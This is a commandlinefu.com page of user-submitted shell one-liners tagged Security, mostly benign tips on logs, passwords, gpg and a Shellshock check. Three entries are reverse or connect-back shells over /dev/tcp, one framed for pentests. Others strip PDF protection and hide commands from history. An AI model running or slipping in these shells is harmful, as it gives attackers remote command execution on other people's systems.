Commands tagged Security (51)

  • Remove security from PDF document using this very simple command on Linux and OSX. You need ghostscript for this baby to work.


    48
    gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=OUTPUT.pdf -c .setpdfwrite -f INPUT.pdf
    deijmaster · 2009-12-14 21:30:22 44
  • Show the number of failed tries of login per account. If the user does not exist it is marked with *. Show Sample Output


    24
    sudo zcat /var/log/auth.log.*.gz | awk '/Failed password/&&!/for invalid user/{a[$9]++}/Failed password for invalid user/{a["*" $11]++}END{for (i in a) printf "%6s\t%s\n", a[i], i|"sort -n"}'
    point_to_null · 2009-03-21 06:41:59 17
  • Thanks to OpenSSL, you can quickly and easily generate MD5 hashes for your passwords. Alternative (thanks to linuxrawkstar and atoponce): echo -n 'text to be encrypted' | md5sum - Note that the above method does not utlise OpenSSL. Show Sample Output


    18
    echo -n 'text to be encrypted' | openssl md5
    Zenexer · 2009-03-18 00:11:46 19
  • By default sudo 'remembers' password for a few minutes, so that you do not need to re-enter password for a series of sudo commands that might follow within a short time duration. However, sometime you might want sudo to instantly 'forget' the password. (Next sudo command will need you to reenter the password) Credit: I first learned this while listening to one of the 'tuxradar' podcast. Show Sample Output


    17
    sudo -K
    b_t · 2010-10-05 12:44:26 6
  • -B flag = don't include characters that can be confused for other characters (this helps when you give someone their password for the first time so they don't cause a lockout with, for example, denyhosts or fail2ban) -s flag = make a "secure", or hard-to-crack password -y flag = include special characters (not used in the example because so many people hate it -- however I recommend it) "1 10" = output 1 password, make it 10 characters in length For even more secure passwords please use the -y flag to include special characters like so: pwgen -Bsy 10 1 output>> }&^Y?.>7Wu Show Sample Output


    15
    pwgen -Bs 10 1
    linuxrawkstar · 2009-12-01 14:33:51 23
  • usage: sitepass MaStErPaSsWoRd example.com description: An admittedly excessive amount of hashing, but this will give you a pretty secure password, It also eliminates repeated characters and deletes itself from your command history. tr '!-~' 'P-~!-O' # this bit is rot47, kinda like rot13 but more nerdy rev # this avoids the first few bytes of gzip payload, and the magic bytes. Show Sample Output


    13
    sitepass() { echo -n "$@" | md5sum | sha1sum | sha224sum | sha256sum | sha384sum | sha512sum | gzip - | strings -n 1 | tr -d "[:space:]" | tr -s '[:print:]' | tr '!-~' 'P-~!-O' | rev | cut -b 2-11; history -d $(($HISTCMD-1)); }
    grokskookum · 2009-10-01 20:14:57 14
  • for Mac OS X Show Sample Output


    9
    openssl rand -base64 6
    gikku · 2009-12-02 10:10:58 13
  • This is sneaky. First, start a listening service on your box. nc -l 8080 -vvv & On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor. exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done You can send it to the background like this: (exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) & Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client. Show Sample Output


    9
    exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
    somaddict · 2012-11-16 02:48:01 10
  • This is just a proof of concept: A FILE WHICH CAN AUTOMOUNT ITSELF through a SIMPLY ENCODED script. It takes advantage of the OFFSET option of mount, and uses it as a password (see that 9191? just change it to something similar, around 9k). It works fine, mounts, gets modified, updated, and can be moved by just copying it. USAGE: SEE SAMPLE OUTPUT The file is composed of three parts: a) The legible script (about 242 bytes) b) A random text fill to reach the OFFSET size (equals PASSWORD minus 242) c) The actual filesystem Logically, (a)+(b) = PASSWORD, that means OFFSET, and mount uses that option. PLEASE NOTE: THIS IS NOT AN ENCRYPTED FILESYSTEM. To improve it, it can be mounted with a better encryption script and used with encfs or cryptfs. The idea was just to test the concept... with one line :) It applies the original idea of http://www.commandlinefu.com/commands/view/7382/command-for-john-cons for encrypting the file. The embedded bash script can be grown, of course, and the offset recalculation goes fine. I have my own version with bash --init-file to startup a bashrc with a well-defined environment, aliases, variables. Show Sample Output


    6
    dd if=/dev/zero of=T bs=1024 count=10240;mkfs.ext3 -q T;E=$(echo 'read O;mount -o loop,offset=$O F /mnt;'|base64|tr -d '\n');echo "E=\$(echo $E|base64 -d);eval \$E;exit;">F;cat <(dd if=/dev/zero bs=$(echo 9191-$(stat -c%s F)|bc) count=1) <(cat T;rm T)>>F
    rodolfoap · 2013-01-31 01:38:30 14
  • (Please see sample output for usage) Use any script name (the read command gets it) and it will be encrypted with the extension .crypt, i.e.: myscript --> myscript.crypt You can execute myscript.crypt only if you know the password. If you die, your script dies with you. If you modify the startup line, be careful with the offset calculation of the crypted block (the XX string). Not difficult to make script editable (an offset-dd piped to a gpg -d piped to a vim - piped to a gpg -c directed to script.new ), but not enough space to do it on a one liner. Sorry for the chmod on parentheses, I dont like "-" at the end. Thanks flatcap for the subshell abbreviation to /dev/null Show Sample Output


    6
    read -p 'Script: ' S && C=$S.crypt H='eval "$((dd if=$0 bs=1 skip=//|gpg -d)2>/dev/null)"; exit;' && gpg -c<$S|cat >$C <(echo $H|sed s://:$(echo "$H"|wc -c):) - <(chmod +x $C)
    rodolfoap · 2013-03-10 08:59:45 14
  • (Please see sample output for usage) script.bash is your script, which will be crypted to script.secure script.bash --> script.secure You can execute script.secure only if you know the password. If you die, your script dies with you. If you modify the startup line, be careful with the offset calculation of the crypted block (the XX string). Not difficult to make script editable (an offset-dd piped to a gpg -d piped to a vim - piped to a gpg -c directed to script.new ), but not enough space to do it on a one liner. Show Sample Output


    5
    echo "eval \"\$(dd if=\$0 bs=1 skip=XX 2>/dev/null|gpg -d 2>/dev/null)\"; exit" > script.secure; sed -i s:XX:$(stat -c%s script.secure): script.secure; gpg -c < script.bash >> script.secure; chmod +x script.secure
    rodolfoap · 2013-03-09 11:16:48 21
  • This will encrypt your single file and create a filename.gpg file. Option: * -c : Encrypt with symmetric cipher To decrypt dhinesh@ubuntu:~$ gpg -c sample.rb.gpg Show Sample Output


    4
    gpg -c <filename>
    Dhinesh · 2011-11-21 06:26:59 7
  • You can search for CVEs at https://security-tracker.debian.org/tracker/ or use --report to get full links. This can be added to cron, but unless you're going to do manual patches, you'd just be torturing yourself.


    4
    debsecan --format detail
    pdxdoughnut · 2015-10-22 18:46:41 10
  • This is a quick and easy way of encrypting files in a datastream, without ever really creating an output file from gpg. Useful with cron also, when file(s) have to be sent based on a set schedule.


    3
    cat private-file | gpg2 --encrypt --armor --recipient "Disposable Key" | mailx -s "Email Subject" user@email.com
    slashdot · 2009-10-19 20:38:37 4
  • #4345 also works under windows


    3
    gswin32c -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pdfwrite -sFONTPATH=%windir%/fonts;xfonts;. -sPDFPassword= -dPDFSETTINGS=/prepress -dPassThroughJPEGImages=true -sOutputFile=OUTPUT.pdf INPUT.pdf
    till · 2011-05-24 14:08:20 7
  • <space>secret_command;export HISTCONTROL= This will make "secret_command" not appear in "history" list.


    3
    export HISTCONTROL=ignorespace
    gorynka · 2013-07-25 08:31:10 10
  • If this command prints 'x' then your shell is vulnerable. Null output confirms that you are protected. Further reading: http://allanmcrae.com/2014/09/shellshock-and-arch-linux/ Show Sample Output


    3
    x="() { :; }; echo x" bash -c :
    malathion · 2014-12-08 22:21:18 9
  • Someone might attack on your system. You can drop attacker IP using IPtables. However, you can use route command to null route unwanted traffic. A null route (also called as blackhole route) is a network route or kernel routing table entry that goes nowhere. Matching packets are dropped (ignored) rather than forwarded, acting as a kind of very limited firewall. The act of using null routes is often called blackhole filtering. Show Sample Output


    2
    sudo route add xxx.xxx.xxx.xxx gw 127.0.0.1 lo
    JackiesJungle · 2009-02-23 19:58:09 11

  • 2
    arp -s $(route -n | awk '/^0.0.0.0/ {print $2}') \ $(arp -n | grep `route -n | awk '/^0.0.0.0/ {print $2}'`| awk '{print $3}')
    aramosf · 2009-03-25 09:53:10 8

  • 2
    denyhosts-remove $IP_ADDRESS
    linuxrawkstar · 2009-11-19 16:28:34 11
  • Connect-back shell using Bash built-ins. Useful in a web app penetration test, if it's the case of a locked down environment, without the need for file uploads or a writable directory. -- /dev/tcp and /dev/udb redirects must be enabled at compile time in Bash. Most Linux distros enable this feature by default but at least Debian is known to disable it. -- http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/


    2
    exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
    truemilk · 2010-03-18 17:25:08 7
  • This should automatically mount it to /media/truecrypt1. Further mounts will go to /media/truecrypt2, and so on. You shouldn't need sudo/su if your permissions are right. I alias tru='truecrypt' since tr and true are commands. To explicitly create a mount point do: tru volume.tc /media/foo To make sure an GUI explorer window (nautilus, et al) opens on the mounted volume, add: --explorer To see what you currently have mounted do: tru -l To dismount a volume do: tru -d volume.tc. To dismount all mounted volumes at once do: tru -d Tested with Truecrypt v6.3a / Ubuntu 9.10


    2
    truecrypt volume.tc
    rkulla · 2010-04-14 18:34:09 4

  • 2
    bash -i >& /dev/tcp/IP/PORT 0>&1
    rux · 2011-02-16 11:54:29 4
  • Downloads Bluetack's level 1 IP blocklist in .p2p format, suitable for various Bittorrent clients.


    2
    wget -O - http://list.iblocklist.com/\?list\=ydxerpxkpcfqjaybcssw\&fileformat\=p2p\&archiveformat\=gz | gunzip > ~/ipfilter.p2p
    lordtoran · 2015-10-11 13:04:08 13
  • Test whether real-time virus detection is working by running this command and checking for eicar.com in /tmp. Requires real-time scanning to be enabled and active on the /tmp directory. If scanning is active, the file should be quarantined/deleted (depending on your settings) moments after running this command. If not, the (harmless) test file should remain in your /tmp directory.


    1
    echo 'K5B!C%@NC[4\CMK54(C^)7PP)7}$RVPNE-FGNAQNEQ-NAGVIVEHF-GRFG-SVYR!$U+U*' | tr '[A-Za-z]' '[N-ZA-Mn-za-m]' > /tmp/eicar.com
    cyberscribe · 2010-08-13 21:39:35 7
  •  1 2 3 > 

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands


Check These Out

Uniquely (sort of) color text so you can see changes
Colorify colors input by converting the text to a number and then performing modulo 7 on it. This resulting number is used as the color escape code. This can be used to color the results of commands with complex outputs (like "482279054165371") so if any of the digits change, there's a good chance the color will change too. I say good chance because there's only 7 unique colors here, so assuming you were watching random numbers, there would be a 6/7 chance that the color would change when the number changed. This should really only be used to help quickly identify when things change, but should not be the only thing relied upon to positively assert that an output has not changed.

Rename files in batch

Duplicating service runlevel configurations from one server to another.
And then to complete the task: Go to target host; $ssh host Turn everything off: $for i in `chkconfig --list | fgrep :on | awk '{print $1}'` ; do chkconfig --level 12345 $i off; done Create duplicate config: $while read line; do chkconfig --level $line on; done < foo

Set laptop display brightness
Run as root. Path may vary depending on laptop model and video card (this was tested on an Acer laptop with ATI HD3200 video). $ cat /proc/acpi/video/VGA/LCD/brightness to discover the possible values for your display.

no # comments, blank lines, white space. # can start in any column
The shortest and most complete comment/blank line remover... Any line where the first non-whitespace character is # (ie, indented # comments), and all null and blank lines are removed. Use the alias as a filter: $ noc /etc/hosts or $ grep server /etc/hosts | noc Change to nawk depending awk versions.

intercept stdout/stderr of another process
similar to the previous command, but with more friendly output (tested on linux)

Convert IP octets to HEX with no dots.
Converts IP octets to hex using printf command. Useful for generating pxeboot aliases in the pxelinux.cfg folder.

Pretty man pages under X
You're a developer - but it doesn't mean you have to slum it! Why not spice up your man page lookups by using a decent PDF viewer. I use 'xpdf' - maybe you prefer acroread, whatever, it's just as fast as plain dull ASCII on today's machines and you can still search for stuff - that's the main reason I use PDF and not PS.

pretend to be busy in office to enjoy a cup of coffee
The first parameter after timeout is the key parameter; number of seconds to wait. With a 6 you have 600 seconds for your coffee break (10min).

Limit the transfer rate of a pipe with pv
-L RATE, --rate-limit RATE Limit the transfer to a maximum of RATE bytes per second. A suffix of "k", "m", "g", or "t" can be added to denote kilobytes (*1024), megabytes, and so on. It must be an integer.


Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for: